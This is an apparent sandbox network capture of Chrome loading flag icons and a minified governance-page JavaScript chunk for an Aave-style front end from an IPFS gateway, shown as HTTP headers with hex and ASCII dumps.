                                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1326INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:59 GMT
                                                                                                                                                                                                                                                  Content-Type: image/svg+xml
                                                                                                                                                                                                                                                  Content-Length: 271
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreidm7bo2ktkmkvg2a6zk5rxq34uwapmnfcqqf3koc7ootgt5pv43ti"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/icons/flags/fr.svg
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeig3gyfey2cvkgtdeyklommqqwwsiwdiuxrnhyhxqmdojzxzf2p22a,bafybeih4p4nhrhou7h6t7ficolttjj57f6mutgszdzy3wyacr2i2nnc65m,bafkreidm7bo2ktkmkvg2a6zk5rxq34uwapmnfcqqf3koc7ootgt5pv43ti
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-03
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 73311
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8ca0e480ff907289-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC43INData Raw: 3c 73 76 67 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 30 20 31 34 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d
                                                                                                                                                                                                                                                  Data Ascii: <svg viewBox="0 0 20 14" fill="none" xmlns=
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC228INData Raw: 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 70 61 74 68 20 64 3d 22 4d 32 30 2e 30 39 39 2d 31 2e 33 37 38 48 2d 2e 30 39 39 56 31 35 2e 33 38 48 32 30 2e 31 56 2d 31 2e 33 37 39 5a 22 20 66 69 6c 6c 3d 22 23 45 44 32 39 33 39 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 31 33 2e 33 36 37 2d 31 2e 33 37 38 48 2d 2e 31 56 31 35 2e 33 38 68 31 33 2e 34 36 36 56 2d 31 2e 33 37 39 5a 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 36 2e 36 33 33 2d 31 2e 33 37 38 48 2d 2e 30 39 39 56 31 35 2e 33 38 68 36 2e 37 33 32 56 2d 31 2e 33 37 39 5a 22 20 66 69 6c 6c 3d 22 23 30 30 32 33 39 35 22 2f 3e 3c 2f 73 76 67 3e 0a
                                                                                                                                                                                                                                                  Data Ascii: "http://www.w3.org/2000/svg"><path d="M20.099-1.378H-.099V15.38H20.1V-1.379Z" fill="#ED2939"/><path d="M13.367-1.378H-.1V15.38h13.466V-1.379Z" fill="#fff"/><path d="M6.633-1.378H-.099V15.38h6.732V-1.379Z" fill="#002395"/></svg>


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  136192.168.2.549860209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC784OUTGET /icons/flags/el.svg HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1326INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:59 GMT
                                                                                                                                                                                                                                                  Content-Type: image/svg+xml
                                                                                                                                                                                                                                                  Content-Length: 449
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreihayzqiolkp7exxcwiubdnvxzzj4tughed442igxyfhssudmyh6za"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/icons/flags/el.svg
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeig3gyfey2cvkgtdeyklommqqwwsiwdiuxrnhyhxqmdojzxzf2p22a,bafybeih4p4nhrhou7h6t7ficolttjj57f6mutgszdzy3wyacr2i2nnc65m,bafkreihayzqiolkp7exxcwiubdnvxzzj4tughed442igxyfhssudmyh6za
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-03
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 73311
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8ca0e4811a6942c4-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC43INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 32 30 22 20 68 65 69 67 68 74 3d 22 32 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 30
                                                                                                                                                                                                                                                  Data Ascii: <svg width="20" height="20" viewBox="0 0 20
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC406INData Raw: 20 31 34 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 67 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 61 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 32 31 20 33 48 30 76 31 34 68 32 31 56 33 5a 22 20 66 69 6c 6c 3d 22 23 30 44 35 45 41 46 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 32 31 20 31 36 48 30 76 2d 31 2e 36 32 33 68 32 31 56 31 36 5a 6d 30 2d 33 2e 32 35 48 30 76 2d 31 2e 36 32 33 68 33 2e 31 31 31 76 2d 33 2e 32 35 48 30 56 36 2e 32 35 68 33 2e 31 31 31 56 33 68 31 2e 35 35 34 76 33 2e 32 35 68 33 2e 31 31 32 76 31 2e 36 32 33 48 32 31 76 31 2e 36 32 33 48 37 2e 37 37 37 56 37 2e 38 37 33 48 34 2e 36 36 35 76 33 2e 32 35 48 32 31 76 31 2e 36 32
                                                                                                                                                                                                                                                  Data Ascii: 14" fill="none" xmlns="http://www.w3.org/2000/svg"><g clip-path="url(#a)"><path d="M21 3H0v14h21V3Z" fill="#0D5EAF"/><path d="M21 16H0v-1.623h21V16Zm0-3.25H0v-1.623h3.111v-3.25H0V6.25h3.111V3h1.554v3.25h3.112v1.623H21v1.623H7.777V7.873H4.665v3.25H21v1.62


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  137192.168.2.549863209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC516OUTGET /_next/static/chunks/pages/governance-0757370cd87e1b88.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1367INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:59 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 40795
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreifhovi3tkr7sznik34oheqx6qh6rwfmhpjh3wh2tm3c3lp7rngldi"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/pages/governance-0757370cd87e1b88.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafybeiarzqpstoo26we45swmenr4cty2xldwzxkk3de3tw2jrdlwkngi2a,bafkreifhovi3tkr7sznik34oheqx6qh6rwfmhpjh3wh2tm3c3lp7rngldi
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC137INData Raw: 78 2d 69 70 66 73 2d 70 6f 70 3a 20 72 61 69 6e 62 6f 77 2d 64 63 31 33 2d 31 30 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 67 65 3a 20 39 38 37 35 32 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 38 31 34 62 63 62 31 39 37 31 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: x-ipfs-pop: rainbow-dc13-10CF-Cache-Status: HITAge: 98752Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e4814bcb1971-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 33 34 35 5d 2c 7b 38 34 31 31 30 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 65 3d 65 7c 7c 7b 7d 3b 76 61 72 20 6e 3d 74 2e 70 72 6f 74 6f 74 79 70 65 2c 6f 3d 7b 66 75 74 75 72 65 3a 22 69 6e 20 25 73 22 2c 70 61 73 74 3a 22 25 73 20 61 67 6f 22 2c 73 3a 22 61 20 66 65 77 20 73 65 63 6f 6e 64 73 22 2c 6d 3a 22 61 20 6d 69 6e 75 74 65 22 2c 6d 6d 3a 22 25 64 20 6d 69 6e 75 74 65 73 22 2c 68 3a 22 61 6e 20 68 6f 75 72 22
                                                                                                                                                                                                                                                  Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4345],{84110:function(e){e.exports=function(){"use strict";return function(e,t,r){e=e||{};var n=t.prototype,o={future:"in %s",past:"%s ago",s:"a few seconds",m:"a minute",mm:"%d minutes",h:"an hour"
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 3b 76 61 72 20 6e 3d 72 28 34 39 35 30 31 29 2c 6f 3d 72 28 36 32 30 39 37 29 2c 73 3d 72 28 36 31 32 32 35 29 2c 69 3d 72 28 32 39 36 33 30 29 2c 61 3d 72 28 37 39 30 37 32 29 2c 6c 3d 72 28 35 31 35 32 29 2c 63 3d 72 28 36 37 32 39 34 29 2c 64 3d 72 28 33 34 36 33 37 29 2c 75 3d 72 28 35 39 33 37 39 29 2c 70 3d 72 28 37 30 36 37 35 29 2c 68 3d 72 28 37 35 33 33 31 29 2c 78 3d 72 28 35 36 33 36 35 29 2c 66 3d 72 28 37 35 30 38 34 29 2c 76 3d 72 28 33 30 31 32 30 29 2c 67 3d 72 28 38 31 36 34 35 29 2c 6d 3d 72 28 32 38 35 33 33 29 2c 6a 3d 72 28 36 38 38 36 31 29 2c 62 3d 72 28 37 38 33 37 31 29 2c 79 3d 72 28 35 37 36 30 39 29 2c 77 3d 72 28 37 34 38 31 35 29 2c 50 3d 72 28 38 35 38 39 33 29 3b 66 75 6e 63 74 69 6f 6e 20 5a 28 65 29 7b 76 61 72 20 74 3d
                                                                                                                                                                                                                                                  Data Ascii: ;var n=r(49501),o=r(62097),s=r(61225),i=r(29630),a=r(79072),l=r(5152),c=r(67294),d=r(34637),u=r(59379),p=r(70675),h=r(75331),x=r(56365),f=r(75084),v=r(30120),g=r(81645),m=r(28533),j=r(68861),b=r(78371),y=r(57609),w=r(74815),P=r(85893);function Z(e){var t=
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 63 6f 6c 6c 65 63 74 69 76 65 6c 79 20 64 69 73 63 75 73 73 2c 20 70 72 6f 70 6f 73 65 2c 20 61 6e 64 20 76 6f 74 65 20 6f 6e 20 75 70 67 72 61 64 65 73 20 74 6f 20 74 68 65 20 70 72 6f 74 6f 63 6f 6c 2e 20 41 41 56 45 20 74 6f 6b 65 6e 2d 68 6f 6c 64 65 72 73 20 28 45 74 68 65 72 65 75 6d 20 6e 65 74 77 6f 72 6b 20 6f 6e 6c 79 29 20 63 61 6e 20 65 69 74 68 65 72 20 76 6f 74 65 20 74 68 65 6d 73 65 6c 76 65 73 20 6f 6e 20 6e 65 77 20 70 72 6f 70 6f 73 61 6c 73 20 6f 72 20 64 65 6c 61 67 61 74 65 20 74 6f 20 61 6e 20 61 64 64 72 65 73 73 20 6f 66 20 63 68 6f 69 63 65 2e 20 54 6f 20 6c 65 61 72 6e 20 6d 6f 72 65 20 63 68 65 63 6b 20 6f 75 74 20 74 68 65 20 47 6f 76 65 72 6e 61 6e 63 65 22 7d 29 2c 22 20 22 2c 28 30 2c 50 2e 6a 73 78 29 28 6a 2e 72 55 2c 7b
                                                                                                                                                                                                                                                  Data Ascii: collectively discuss, propose, and vote on upgrades to the protocol. AAVE token-holders (Ethereum network only) can either vote themselves on new proposals or delagate to an address of choice. To learn more check out the Governance"})," ",(0,P.jsx)(j.rU,{
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 28 30 2c 56 2e 5a 50 29 28 42 2e 42 32 2e 67 6f 76 65 72 6e 61 6e 63 65 43 6f 72 65 53 75 62 67 72 61 70 68 55 72 6c 2c 57 2c 7b 71 75 65 72 79 3a 65 2c 66 69 72 73 74 3a 31 30 7d 29 7d 28 6f 29 7d 2c 65 6e 61 62 6c 65 64 3a 22 22 21 3d 3d 65 2c 71 75 65 72 79 4b 65 79 3a 5b 22 73 65 61 72 63 68 50 72 6f 70 6f 73 61 6c 73 22 2c 6f 5d 2c 73 65 6c 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 70 72 6f 70 6f 73 61 6c 53 65 61 72 63 68 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 70 72 6f 70 6f 73 61 6c 49 64 7d 29 29 7d 7d 29 2c 69 3d 73 2e 64 61 74 61 2c 61 3d 73 2e 69 73 46 65 74 63 68 69 6e 67 2c 6c 3d 28 30 2c 46 2e 61 29 28 7b 71 75 65 72 79
                                                                                                                                                                                                                                                  Data Ascii: nction(e){return(0,V.ZP)(B.B2.governanceCoreSubgraphUrl,W,{query:e,first:10})}(o)},enabled:""!==e,queryKey:["searchProposals",o],select:function(e){return e.proposalSearch.map((function(e){return e.proposalId}))}}),i=s.data,a=s.isFetching,l=(0,F.a)({query
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 6d 43 68 61 6e 67 65 3a 72 7d 29 5d 7d 29 7d 2c 51 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 70 72 6f 70 6f 73 61 6c 46 69 6c 74 65 72 2c 72 3d 65 2e 68 61 6e 64 6c 65 43 68 61 6e 67 65 2c 6f 3d 65 2e 68 61 6e 64 6c 65 53 65 61 72 63 68 51 75 65 72 79 43 68 61 6e 67 65 3b 72 65 74 75 72 6e 28 30 2c 50 2e 6a 73 78 73 29 28 50 2e 46 72 61 67 6d 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 50 2e 6a 73 78 29 28 58 2e 5f 2c 7b 74 69 74 6c 65 3a 28 30 2c 50 2e 6a 73 78 29 28 6e 2e 63 43 2c 7b 69 64 3a 22 50 72 6f 70 6f 73 61 6c 73 22 7d 29 2c 74 69 74 6c 65 50 72 6f 70 73 3a 7b 76 61 72 69 61 6e 74 3a 22 68 33 22 7d 2c 6f 6e 53 65 61 72 63 68 54 65 72 6d 43 68 61 6e 67 65 3a 6f 2c 73 65 61 72 63 68 50 6c 61 63 65 68 6f 6c 64 65 72
                                                                                                                                                                                                                                                  Data Ascii: mChange:r})]})},Q=function(e){var t=e.proposalFilter,r=e.handleChange,o=e.handleSearchQueryChange;return(0,P.jsxs)(P.Fragment,{children:[(0,P.jsx)(X._,{title:(0,P.jsx)(n.cC,{id:"Proposals"}),titleProps:{variant:"h3"},onSearchTermChange:o,searchPlaceholder
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 74 72 61 63 6b 45 76 65 6e 74 7d 29 29 3b 72 65 74 75 72 6e 28 30 2c 50 2e 6a 73 78 73 29 28 76 2e 5a 2c 7b 73 78 3a 7b 70 3a 36 2c 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 66 6c 65 78 57 72 61 70 3a 22 77 72 61 70 22 2c 6a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 73 70 61 63 65 2d 62 65 74 77 65 65 6e 22 2c 62 6f 72 64 65 72 42 6f 74 74 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 31 70 78 20 73 6f 6c 69 64 20 22 2e 63 6f 6e 63 61 74 28 65 2e 70 61 6c 65 74 74 65 2e 64 69 76 69 64 65 72 29 7d 7d 2c 63 6f 6d 70 6f 6e 65 6e 74 3a 6a 2e 72 55 2c 6f 6e 43 6c 69 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 28 79 2e 78 4d 2e 56 49 45 57 5f 41 49 50 2c 7b 41 49 50 3a
                                                                                                                                                                                                                                                  Data Ascii: on(e){return e.trackEvent}));return(0,P.jsxs)(v.Z,{sx:{p:6,display:"flex",flexWrap:"wrap",justifyContent:"space-between",borderBottom:function(e){return"1px solid ".concat(e.palette.divider)}},component:j.rU,onClick:function(){return r(y.xM.VIEW_AIP,{AIP:
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 3b 72 65 74 75 72 6e 28 74 3d 76 29 2e 70 75 73 68 2e 61 70 70 6c 79 28 74 2c 28 30 2c 4f 2e 5a 29 28 65 2e 70 72 6f 70 6f 73 61 6c 73 29 29 7d 29 29 2c 22 61 6c 6c 22 21 3d 3d 74 26 26 28 76 3d 76 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 62 61 64 67 65 53 74 61 74 65 3d 3d 3d 6e 7d 29 29 29 2c 28 30 2c 50 2e 6a 73 78 73 29 28 41 2e 5a 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 50 2e 6a 73 78 29 28 24 2c 7b 70 72 6f 70 6f 73 61 6c 46 69 6c 74 65 72 3a 74 2c 68 61 6e 64 6c 65 50 72 6f 70 6f 73 61 6c 46 69 6c 74 65 72 43 68 61 6e 67 65 3a 72 2c 68 61 6e 64 6c 65 53 65 61 72 63 68 51 75 65 72 79 43 68 61 6e 67 65 3a 69 7d 29 2c 76 2e 6c 65 6e 67 74 68 3e 30 3f 28 30 2c 50 2e 6a 73 78 73 29 28 45 28 29 2c 7b
                                                                                                                                                                                                                                                  Data Ascii: ;return(t=v).push.apply(t,(0,O.Z)(e.proposals))})),"all"!==t&&(v=v.filter((function(e){return e.badgeState===n}))),(0,P.jsxs)(A.Z,{children:[(0,P.jsx)($,{proposalFilter:t,handleProposalFilterChange:r,handleSearchQueryChange:i}),v.length>0?(0,P.jsxs)(E(),{
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 30 2c 73 78 3a 7b 6d 62 3a 34 7d 2c 6c 6f 61 64 69 6e 67 3a 21 30 7d 29 2c 28 30 2c 50 2e 6a 73 78 29 28 6e 65 2e 41 2c 7b 70 65 72 63 65 6e 74 3a 30 2c 76 6f 74 65 73 3a 30 2c 6c 6f 61 64 69 6e 67 3a 21 30 7d 29 5d 7d 29 5d 7d 29 7d 2c 61 65 3d 72 28 33 37 36 35 29 2c 6c 65 3d 72 28 34 34 33 37 33 29 3b 76 61 72 20 63 65 3d 28 30 2c 72 28 36 31 33 35 34 29 2e 5a 29 28 29 2c 64 65 3d 72 28 39 32 37 39 29 2c 75 65 3d 72 28 35 30 31 31 36 29 2c 70 65 3d 72 28 34 31 30 32 34 29 2c 68 65 3d 72 28 39 32 33 39 31 29 2c 78 65 3d 72 28 37 32 36 36 37 29 2c 66 65 3d 72 28 34 32 36 35 33 29 2c 76 65 3d 72 28 37 39 39 37 39 29 2c 67 65 3d 72 28 38 35 38 39 35 29 2c 6d 65 3d 72 28 38 31 39 35 29 2c 6a 65 3d 72 28 37 32 33 39 39 29 2c 62 65 3d 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                                                  Data Ascii: 0,sx:{mb:4},loading:!0}),(0,P.jsx)(ne.A,{percent:0,votes:0,loading:!0})]})]})},ae=r(3765),le=r(44373);var ce=(0,r(61354).Z)(),de=r(9279),ue=r(50116),pe=r(41024),he=r(92391),xe=r(72667),fe=r(42653),ve=r(79979),ge=r(85895),me=r(8195),je=r(72399),be=function
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 6c 69 67 6e 49 74 65 6d 73 3a 22 63 65 6e 74 65 72 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 50 2e 6a 73 78 29 28 78 65 2e 54 31 2c 7b 73 79 6d 62 6f 6c 3a 22 41 41 56 45 22 2c 73 78 3a 7b 77 69 64 74 68 3a 31 36 2c 68 65 69 67 68 74 3a 31 36 7d 7d 29 2c 28 30 2c 50 2e 6a 73 78 29 28 70 65 2e 42 2c 7b 76 61 6c 75 65 3a 74 2c 76 61 72 69 61 6e 74 3a 22 73 75 62 68 65 61 64 65 72 31 22 7d 29 5d 7d 29 7d 29 2c 21 75 26 26 28 30 2c 50 2e 6a 73 78 29 28 68 65 2e 58 2c 7b 61 6c 69 67 6e 3a 22 66 6c 65 78 2d 73 74 61 72 74 22 2c 63 61 70 74 69 6f 6e 3a 28 30 2c 50 2e 6a 73 78 29 28 66 65 2e 4d 2c 7b 61 76 61 74 61 72 50 72 6f 70 73 3a 7b 73 69 7a 65 3a 75 65 2e 44 2e 58 53 7d 2c 74 69 74 6c 65 50 72 6f 70 73 3a 7b 76 61 72 69 61 6e 74 3a 22 73 75 62 68 65
